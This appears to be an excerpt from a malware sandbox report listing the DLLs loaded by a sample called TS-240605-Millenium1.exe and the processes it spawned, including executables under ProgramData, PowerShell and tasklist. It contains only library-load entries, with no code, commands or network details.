Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\main.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\main.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\main.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\main.exe	Section loaded: version.dll
Source: C:\ProgramData\main.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\main.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\main.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\main.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\main.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\main.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\main.exe	Section loaded: wldp.dll
Source: C:\ProgramData\main.exe	Section loaded: profapi.dll
Source: C:\ProgramData\main.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\main.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\main.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\main.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\main.exe	Section loaded: rasman.dll
Source: C:\ProgramData\main.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\main.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\main.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\main.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\main.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\main.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\main.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\main.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\main.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\main.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\main.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\main.exe	Section loaded: secur32.dll
Source: C:\ProgramData\main.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\main.exe	Section loaded: schannel.dll
Source: C:\ProgramData\main.exe	Section loaded: mskeyprotect.dll
Source: C:\ProgramData\main.exe	Section loaded: ntasn1.dll
Source: C:\ProgramData\main.exe	Section loaded: ncrypt.dll
Source: C:\ProgramData\main.exe	Section loaded: ncryptsslp.dll
Source: C:\ProgramData\main.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\main.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\main.exe	Section loaded: amsi.dll
Source: C:\ProgramData\main.exe	Section loaded: userenv.dll
Source: C:\ProgramData\main.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\main.exe	Section loaded: propsys.dll
Source: C:\ProgramData\main.exe	Section loaded: edputil.dll
Source: C:\ProgramData\main.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\main.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\main.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\main.exe	Section loaded: netutils.dll
Source: C:\ProgramData\main.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\main.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\main.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\main.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\main.exe	Section loaded: slc.dll
Source: C:\ProgramData\main.exe	Section loaded: sppc.dll
Source: C:\ProgramData\main.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\main.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
